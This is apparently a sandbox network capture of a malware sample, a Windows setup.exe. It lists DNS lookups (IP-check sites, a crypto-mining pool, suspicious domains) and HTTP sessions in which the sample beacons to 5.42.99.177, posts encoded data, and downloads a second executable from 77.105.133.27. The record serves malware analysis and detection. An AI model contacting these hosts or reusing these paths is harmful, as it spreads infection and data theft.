Jul 2, 2024 00:05:28.084151983 CEST	192.168.2.6	1.1.1.1	0xc3cf	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:37.535862923 CEST	192.168.2.6	1.1.1.1	0x5553	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:41.746795893 CEST	192.168.2.6	1.1.1.1	0x310d	Standard query (0)	ellaboratepwsz.xyz	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:41.831898928 CEST	192.168.2.6	1.1.1.1	0x74ea	Standard query (0)	potterryisiw.shop	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:06.054481030 CEST	192.168.2.6	1.1.1.1	0xecc9	Standard query (0)	tea.arpdabl.org	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:06.753226995 CEST	192.168.2.6	1.1.1.1	0x9f73	Standard query (0)	www.rapidfilestorage.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:06.768124104 CEST	192.168.2.6	1.1.1.1	0xda74	Standard query (0)	service-domain.xyz	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:07.730926037 CEST	192.168.2.6	1.1.1.1	0x52ce	Standard query (0)	helsinki-dtc.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:08.564028025 CEST	192.168.2.6	1.1.1.1	0x11e	Standard query (0)	skrptfiles.tracemonitors.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:23.392842054 CEST	192.168.2.6	1.1.1.1	0xe9d5	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:27.098628044 CEST	192.168.2.6	1.1.1.1	0x1ddf	Standard query (0)	www.rapidfilestorage.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:31.524725914 CEST	192.168.2.6	1.1.1.1	0xb9d9	Standard query (0)	api2.check-data.xyz	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:33.367961884 CEST	192.168.2.6	1.1.1.1	0x8a7b	Standard query (0)	www.rapidfilestorage.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:38.698383093 CEST	192.168.2.6	1.1.1.1	0x7a14	Standard query (0)	www.rapidfilestorage.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 00:04:59.043870926 CEST	1.1.1.1	192.168.2.6	0xbf21	No error (0)	api.myip.com		104.26.9.59	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:04:59.043870926 CEST	1.1.1.1	192.168.2.6	0xbf21	No error (0)	api.myip.com		172.67.75.163	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:04:59.043870926 CEST	1.1.1.1	192.168.2.6	0xbf21	No error (0)	api.myip.com		104.26.8.59	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:00.009198904 CEST	1.1.1.1	192.168.2.6	0x4e34	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.747567892 CEST	1.1.1.1	192.168.2.6	0xd9a4	No error (0)	vk.com		87.240.132.78	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.747567892 CEST	1.1.1.1	192.168.2.6	0xd9a4	No error (0)	vk.com		87.240.132.72	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.747567892 CEST	1.1.1.1	192.168.2.6	0xd9a4	No error (0)	vk.com		87.240.137.164	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.747567892 CEST	1.1.1.1	192.168.2.6	0xd9a4	No error (0)	vk.com		87.240.132.67	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.747567892 CEST	1.1.1.1	192.168.2.6	0xd9a4	No error (0)	vk.com		93.186.225.194	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.747567892 CEST	1.1.1.1	192.168.2.6	0xd9a4	No error (0)	vk.com		87.240.129.133	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.748564959 CEST	1.1.1.1	192.168.2.6	0xadae	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.779968023 CEST	1.1.1.1	192.168.2.6	0x1359	No error (0)	lop.foxesjoy.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.779968023 CEST	1.1.1.1	192.168.2.6	0x1359	No error (0)	lop.foxesjoy.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:05.890382051 CEST	1.1.1.1	192.168.2.6	0xd227	No error (0)	monoblocked.com		45.130.41.108	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:06.492321014 CEST	1.1.1.1	192.168.2.6	0x89f1	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:06.492321014 CEST	1.1.1.1	192.168.2.6	0x89f1	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:06.492321014 CEST	1.1.1.1	192.168.2.6	0x89f1	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:06.492321014 CEST	1.1.1.1	192.168.2.6	0x89f1	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:06.492321014 CEST	1.1.1.1	192.168.2.6	0x89f1	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:08.669147015 CEST	1.1.1.1	192.168.2.6	0x189f	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 2, 2024 00:05:08.669147015 CEST	1.1.1.1	192.168.2.6	0x189f	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 2, 2024 00:05:08.669147015 CEST	1.1.1.1	192.168.2.6	0x189f	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.20.219	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:08.669147015 CEST	1.1.1.1	192.168.2.6	0x189f	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.10.150	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:08.669147015 CEST	1.1.1.1	192.168.2.6	0x189f	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.29.235	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:08.669147015 CEST	1.1.1.1	192.168.2.6	0x189f	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.28.135	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:08.669147015 CEST	1.1.1.1	192.168.2.6	0x189f	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.249.140	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:08.669147015 CEST	1.1.1.1	192.168.2.6	0x189f	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.24.151	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:08.669147015 CEST	1.1.1.1	192.168.2.6	0x189f	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.72.140	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:08.669147015 CEST	1.1.1.1	192.168.2.6	0x189f	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.25.144	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:09.513573885 CEST	1.1.1.1	192.168.2.6	0x3218	No error (0)	a.884736279.xyz		79.174.95.43	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:11.482877016 CEST	1.1.1.1	192.168.2.6	0xa4c5	No error (0)	sun6-23.userapi.com		95.142.206.3	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:13.300714970 CEST	1.1.1.1	192.168.2.6	0xe079	No error (0)	sun6-22.userapi.com		95.142.206.2	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:14.510962963 CEST	1.1.1.1	192.168.2.6	0x1764	No error (0)	sun6-21.userapi.com		95.142.206.1	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:14.723674059 CEST	1.1.1.1	192.168.2.6	0xc55b	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 2, 2024 00:05:14.723674059 CEST	1.1.1.1	192.168.2.6	0xc55b	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:24.946244955 CEST	1.1.1.1	192.168.2.6	0xbdcc	No error (0)	iplogger.org		172.67.132.113	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:24.946244955 CEST	1.1.1.1	192.168.2.6	0xbdcc	No error (0)	iplogger.org		104.21.4.208	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:28.095666885 CEST	1.1.1.1	192.168.2.6	0xc3cf	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:37.545605898 CEST	1.1.1.1	192.168.2.6	0x5553	No error (0)	pool.hashvault.pro		142.202.242.45	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:37.545605898 CEST	1.1.1.1	192.168.2.6	0x5553	No error (0)	pool.hashvault.pro		142.202.242.43	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:41.769963980 CEST	1.1.1.1	192.168.2.6	0x310d	Name error (3)	ellaboratepwsz.xyz	none	none	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:41.845830917 CEST	1.1.1.1	192.168.2.6	0x74ea	No error (0)	potterryisiw.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:05:41.845830917 CEST	1.1.1.1	192.168.2.6	0x74ea	No error (0)	potterryisiw.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:06.196818113 CEST	1.1.1.1	192.168.2.6	0xecc9	No error (0)	tea.arpdabl.org		207.180.253.128	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:06.824305058 CEST	1.1.1.1	192.168.2.6	0xda74	No error (0)	service-domain.xyz		54.210.117.250	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:06.852968931 CEST	1.1.1.1	192.168.2.6	0x9f73	No error (0)	www.rapidfilestorage.com	env-3936544.jcloud.kz		CNAME (Canonical name)	IN (0x0001)	false
Jul 2, 2024 00:06:06.852968931 CEST	1.1.1.1	192.168.2.6	0x9f73	No error (0)	env-3936544.jcloud.kz		185.22.66.16	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:06.852968931 CEST	1.1.1.1	192.168.2.6	0x9f73	No error (0)	env-3936544.jcloud.kz		185.22.66.15	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:07.796632051 CEST	1.1.1.1	192.168.2.6	0x52ce	No error (0)	helsinki-dtc.com		194.67.87.38	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:08.632812023 CEST	1.1.1.1	192.168.2.6	0x11e	No error (0)	skrptfiles.tracemonitors.com	d1u0l9f6kr1di3.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 2, 2024 00:06:08.632812023 CEST	1.1.1.1	192.168.2.6	0x11e	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.225.78.36	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:08.632812023 CEST	1.1.1.1	192.168.2.6	0x11e	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.225.78.49	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:08.632812023 CEST	1.1.1.1	192.168.2.6	0x11e	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.225.78.29	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:08.632812023 CEST	1.1.1.1	192.168.2.6	0x11e	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.225.78.22	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:23.402136087 CEST	1.1.1.1	192.168.2.6	0xe9d5	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 2, 2024 00:06:23.402136087 CEST	1.1.1.1	192.168.2.6	0xe9d5	No error (0)	googlehosted.l.googleusercontent.com		142.250.181.225	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:27.192662001 CEST	1.1.1.1	192.168.2.6	0x1ddf	No error (0)	www.rapidfilestorage.com	env-3936544.jcloud.kz		CNAME (Canonical name)	IN (0x0001)	false
Jul 2, 2024 00:06:27.192662001 CEST	1.1.1.1	192.168.2.6	0x1ddf	No error (0)	env-3936544.jcloud.kz		185.22.66.16	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:27.192662001 CEST	1.1.1.1	192.168.2.6	0x1ddf	No error (0)	env-3936544.jcloud.kz		185.22.66.15	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:31.548161983 CEST	1.1.1.1	192.168.2.6	0xb9d9	No error (0)	api2.check-data.xyz	checkdata-1114476139.us-west-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 2, 2024 00:06:31.548161983 CEST	1.1.1.1	192.168.2.6	0xb9d9	No error (0)	checkdata-1114476139.us-west-2.elb.amazonaws.com		44.240.96.128	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:31.548161983 CEST	1.1.1.1	192.168.2.6	0xb9d9	No error (0)	checkdata-1114476139.us-west-2.elb.amazonaws.com		44.237.52.63	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:33.466475010 CEST	1.1.1.1	192.168.2.6	0x8a7b	No error (0)	www.rapidfilestorage.com	env-3936544.jcloud.kz		CNAME (Canonical name)	IN (0x0001)	false
Jul 2, 2024 00:06:33.466475010 CEST	1.1.1.1	192.168.2.6	0x8a7b	No error (0)	env-3936544.jcloud.kz		185.22.66.15	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:33.466475010 CEST	1.1.1.1	192.168.2.6	0x8a7b	No error (0)	env-3936544.jcloud.kz		185.22.66.16	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:38.805356979 CEST	1.1.1.1	192.168.2.6	0x7a14	No error (0)	www.rapidfilestorage.com	env-3936544.jcloud.kz		CNAME (Canonical name)	IN (0x0001)	false
Jul 2, 2024 00:06:38.805356979 CEST	1.1.1.1	192.168.2.6	0x7a14	No error (0)	env-3936544.jcloud.kz		185.22.66.16	A (IP address)	IN (0x0001)	false
Jul 2, 2024 00:06:38.805356979 CEST	1.1.1.1	192.168.2.6	0x7a14	No error (0)	env-3936544.jcloud.kz		185.22.66.15	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	5.42.99.177	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:04:58.113224030 CEST	203	OUT	GET /api/crazyfish.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.99.177
Jul 2, 2024 00:04:59.024328947 CEST	259	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:04:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 66 69 73 68 31 35 Data Ascii: fish15
Jul 2, 2024 00:05:03.015115976 CEST	272	OUT	POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 133 Host: 5.42.99.177
Jul 2, 2024 00:05:03.015158892 CEST	133	OUT	Data Raw: 64 61 74 61 3d 61 49 42 6b 4b 71 71 36 70 41 37 6b 64 41 36 4d 74 4c 73 56 34 54 64 4f 77 64 7a 56 52 45 77 47 5f 5a 36 31 66 52 4a 54 65 4c 42 75 65 64 79 38 54 34 6b 34 5f 48 4b 45 78 4e 61 41 4f 33 78 45 31 6c 33 2d 75 66 38 55 34 6a 6d 70 39 Data Ascii: data=aIBkKqq6pA7kdA6MtLsV4TdOwdzVREwG_Z61fRJTeLBuedy8T4k4_HKExNaAO3xE1l3-uf8U4jmp9kHKihEg38-0DksW7mDTMatT04FSPhQG8Xvk2DChlNwyRHIENHby
Jul 2, 2024 00:05:05.111407995 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 2904 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 67 41 65 6f 67 51 6b 48 76 34 39 63 70 55 55 71 56 2b 79 61 62 37 45 48 42 4e 73 61 72 34 59 68 7a 6a 70 39 4e 6b 63 77 56 67 66 42 4c 30 4c 41 68 76 70 58 61 34 7a 41 38 36 63 59 59 76 4b 41 71 5a 42 56 6d 76 42 6a 47 55 6d 4f 63 64 52 50 63 57 39 48 68 49 52 35 44 33 70 69 32 34 5a 37 71 57 69 62 67 31 76 36 6f 67 70 37 63 58 4f 57 75 41 74 57 79 30 70 59 4d 58 57 69 39 7a 57 6c 69 47 55 34 49 44 48 35 78 4a 67 66 31 39 69 44 39 59 75 76 69 34 4b 31 71 36 36 39 43 57 43 66 56 44 32 35 78 32 51 52 63 72 67 36 65 71 39 36 39 32 67 68 55 59 79 44 4d 76 72 37 61 72 53 35 33 6e 53 43 33 59 4f 55 34 75 36 6a 52 5a 4a 4f 70 66 6f 70 64 6e 31 55 6e 59 5a 4b 66 4d 4d 68 5a 43 37 6b 55 54 33 44 42 30 63 75 6c 59 52 36 35 32 4a 62 52 63 63 4e 6e 69 44 59 68 73 58 49 70 53 4e 42 53 77 4c 4a 38 31 44 43 68 6e 33 42 73 34 4f 7a 66 42 43 75 4b 6a 48 64 36 6e 4f 30 43 6d 65 78 72 30 34 79 42 79 35 64 4d 77 59 6e 59 72 78 33 4d 38 49 2f 52 32 2f 62 66 67 59 75 2f 38 32 78 4e 68 4f 69 57 68 2b 34 63 6e 36 34 67 4d [TRUNCATED] Data Ascii: gAeogQkHv49cpUUqV+yab7EHBNsar4Yhzjp9NkcwVgfBL0LAhvpXa4zA86cYYvKAqZBVmvBjGUmOcdRPcW9HhIR5D3pi24Z7qWibg1v6ogp7cXOWuAtWy0pYMXWi9zWliGU4IDH5xJgf19iD9Yuvi4K1q669CWCfVD25x2QRcrg6eq9692ghUYyDMvr7arS53nSC3YOU4u6jRZJOpfopdn1UnYZKfMMhZC7kUT3DB0culYR652JbRccNniDYhsXIpSNBSwLJ81DChn3Bs4OzfBCuKjHd6nO0Cmexr04yBy5dMwYnYrx3M8I/R2/bfgYu/82xNhOiWh+4cn64gM+BK+nG286BPlJVgbkxOfCrPEUQWvI9aZrYg1o6IWvYZd9b1wLvMUFvWkwfrS1BBtAVgBTZID1TQ/+br1wndsB66hlwXkyBURvix0kDEzBiTmZqyFac74lO077Rl9RvQktRFhCmXmFX679uUP/x+v7093zeb6O9MIgWRZGmJ5JRpzjbAGThokvPzjXdSLkJErXiX0egA2+DvU5tEa8KYS3qAJVLsOywyADBSVHvzGp8f4xPF4tlx2uGrzNI+UWuLP8s2+bDBe+EdcDmsMRuhmcnDP/PLSGuDdWge8ZYHXtkddS1Kd15AXlNNhiUEhRvDuBAUEc3TDx8nnfXnhKn0hkAFNhxF1iqInpFoYbpgIfKm1T7t8hdQ8OqJBi69QrN9xj+p6P/SPtJRjiCfqWpj6EuS9UexfZoyPktp55REGiVWjiFzByVs4H3r6CcRMdBpxIOooQXsTC5z7Hf3MOP5R5+jhAENKr6vL9RjB1Oe4I6Bz8Ffz2H4BNvkz/EMGelQ2JYgLzm6bAhWtdC/GeoMz191HTjK5Td4UFA9GYvtBi1M8js8+M2KUawhsYN6aNQzorvH5rPg+Os15xNYPzWlsn+WEW5K8TApDLBv/vihLrUoxf9Dfm/HSCaMDfnwCBzcrlBW
Jul 2, 2024 00:05:05.111426115 CEST	1236	IN	Data Raw: 31 53 6b 44 55 54 55 6c 48 6a 49 66 2b 6e 4e 50 51 41 73 75 4c 43 56 73 73 55 34 6c 69 4f 63 71 39 65 6b 69 62 45 34 70 6c 6f 58 77 39 4c 45 78 30 71 66 62 56 77 69 32 64 56 2b 53 54 36 6f 46 74 34 5a 48 35 6b 77 6f 50 6a 56 33 33 58 35 5a 4b 49 Data Ascii: 1SkDUTUlHjIf+nNPQAsuLCVssU4liOcq9ekibE4ploXw9LEx0qfbVwi2dV+ST6oFt4ZH5kwoPjV33X5ZKIKkknbXcq9nWZTrKmlI8NJbDCvd1KAhSBYGotYscoxhddFoIGcpUSKmYqSRcM+5ligdllSwKSkGzyvW6Bf5kt8yElpK8OxIN41MTau3yZHZolgYgc0TjA5wB4aZNF0gGPkLKfVOaumQctEE5ua4BZ1l2bX00rt/jdb
Jul 2, 2024 00:05:05.111438036 CEST	687	IN	Data Raw: 64 4c 56 65 76 38 63 71 38 53 51 32 55 75 2f 38 6f 32 7a 72 64 4a 4e 73 71 78 4c 43 47 6e 35 63 34 59 4c 66 35 2f 37 32 53 4b 61 61 36 70 47 62 69 69 5a 64 37 32 46 38 49 2f 31 47 53 59 2b 33 68 79 71 53 52 79 65 50 74 68 50 6c 58 59 52 59 48 46 Data Ascii: dLVev8cq8SQ2Uu/8o2zrdJNsqxLCGn5c4YLf5/72SKaa6pGbiiZd72F8I/1GSY+3hyqSRyePthPlXYRYHFsKEbLDc63T1G2RjFY9e/423ey+2tsi9p/NVfrPDX5bLbTgXoGtoCWG/r3SLvcv5vskEvjnwbhhsCo9QZfQRbRMhrI1lhD3A9IgsjglD4bbDGqPhapkqYbnCq90XROGf7pgKDcMGmgnv9jAMpMK04GqjRjE7lnevvO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49714	77.105.133.27	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:05.746052027 CEST	211	OUT	HEAD /download/th/space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Cache-Control: no-cache
Jul 2, 2024 00:05:06.452228069 CEST	392	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=newsoftgnu.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 4959240 Content-Type: application/octet-stream
Jul 2, 2024 00:05:06.452507973 CEST	210	OUT	GET /download/th/space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Cache-Control: no-cache
Jul 2, 2024 00:05:06.668207884 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=newsoftgnu.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 4959240 Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 25 20 81 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 f0 49 00 00 a0 01 00 00 00 00 00 fe 0d 4a 00 00 20 00 00 00 20 4a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 4b 00 00 02 00 00 6f 08 4c 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 0d 4a 00 4b 00 00 00 00 20 4a 00 dc 9d 01 00 00 00 00 00 00 00 00 00 00 92 4b 00 08 1a 00 00 00 c0 4b 00 0c 00 00 00 66 0d 4a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL% fIJ J@ KoL@JK JKKfJ H.textI I `.rsrc JI@@.relocKK@BJH5\|k+j0B+(yV(p8( :&88E8B+(nL~6+(W/~0H+(DcX(p8( :& 88E8B+(VD~6+(\~0+(
Jul 2, 2024 00:05:06.668255091 CEST	1236	IN	Data Raw: 1b 49 6a 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 4f 00 00 00 88 00 00 00 79 00 00 00 05 00 00 00 5e 00 00 00 38 4a 00 00 00 28 0d 00 00 06 20 02 00 00 00 17 3a d2 ff ff ff 26 38 c8 ff ff ff 73 19 00 00 0a 80 06 00 00 Data Ascii: Ij 8EOy^8J( :&8s 8s 9& 8s8s :t&8js80R+(T78E8~o8
Jul 2, 2024 00:05:06.668266058 CEST	1236	IN	Data Raw: 00 06 14 fe 01 16 fe 01 16 fe 03 fe 11 26 20 86 00 00 00 28 af 70 00 06 17 8d 05 00 00 01 0d 09 16 08 7e ea 20 00 04 28 3f 71 00 06 7e eb 20 00 04 28 43 71 00 06 a2 00 09 7e e6 20 00 04 28 33 71 00 06 0b 07 08 7e ea 20 00 04 28 3f 71 00 06 73 28 Data Ascii: & (p~ (?q~ (Cq~ (3q~ (?qs(z~ (Gq!~~ (+q~ (Kq88XA!0&+(?bo)0H
Jul 2, 2024 00:05:06.668338060 CEST	1236	IN	Data Raw: 00 00 00 00 06 2a 00 00 13 30 03 00 19 00 00 00 09 00 00 11 2b 05 28 81 55 19 5f 00 03 12 00 fe 15 06 00 00 1b 06 81 06 00 00 1b 00 2a 00 00 00 13 30 03 00 43 00 00 00 01 00 00 11 2b 05 28 70 91 0c 68 28 25 00 00 06 38 00 00 00 00 00 02 28 2a 00 Data Ascii: 0+(U_0C+(ph(%8(* :&88E8B+(Sb~6+(N~:+(F/(p0.+(CF~+:(++~+8*0
Jul 2, 2024 00:05:06.668349028 CEST	256	IN	Data Raw: 1c 00 00 00 fe 0e 2a 00 38 a8 fc ff ff 22 ca ca 83 42 13 0e 20 0f 00 00 00 38 9b fc ff ff 22 05 90 2b 42 13 27 20 00 00 00 00 28 e2 01 00 06 3a 85 fc ff ff 26 20 01 00 00 00 38 7a fc ff ff 16 13 14 38 03 ff ff ff 20 76 02 00 00 28 af 70 00 06 13 Data Ascii: 8"B 8"+B' (:& 8z8 v(p8"_B 8P 8C8H"A8 8 (p 8 8b 8w (:& 80O
Jul 2, 2024 00:05:06.789550066 CEST	1236	IN	Data Raw: fe 0c 2f 00 45 21 00 00 00 da 02 00 00 ce 02 00 00 a0 03 00 00 e9 00 00 00 48 01 00 00 4d 03 00 00 16 00 00 00 4a 00 00 00 11 03 00 00 74 03 00 00 22 01 00 00 63 03 00 00 f9 02 00 00 8a 01 00 00 a5 01 00 00 c0 02 00 00 05 00 00 00 c3 01 00 00 8b Data Ascii: /E!HMJt"cR}q;u8 <(8u"xB (:K&8A' (:3&8)8 \(p 8
Jul 2, 2024 00:05:06.789657116 CEST	224	IN	Data Raw: 00 00 13 03 00 00 5d 00 00 00 e5 02 00 00 83 01 00 00 e9 01 00 00 4d 01 00 00 c1 01 00 00 ab 03 00 00 38 7c 03 00 00 16 13 12 20 16 00 00 00 38 61 ff ff ff 20 a6 08 00 00 28 af 70 00 06 13 03 20 12 00 00 00 38 4b ff ff ff 1f 43 13 05 20 03 00 00 Data Ascii: ]M8\| 8a (p 8KC (98& 8-B 848A' 8 (:&8A0 (:&8 ( 8L& (
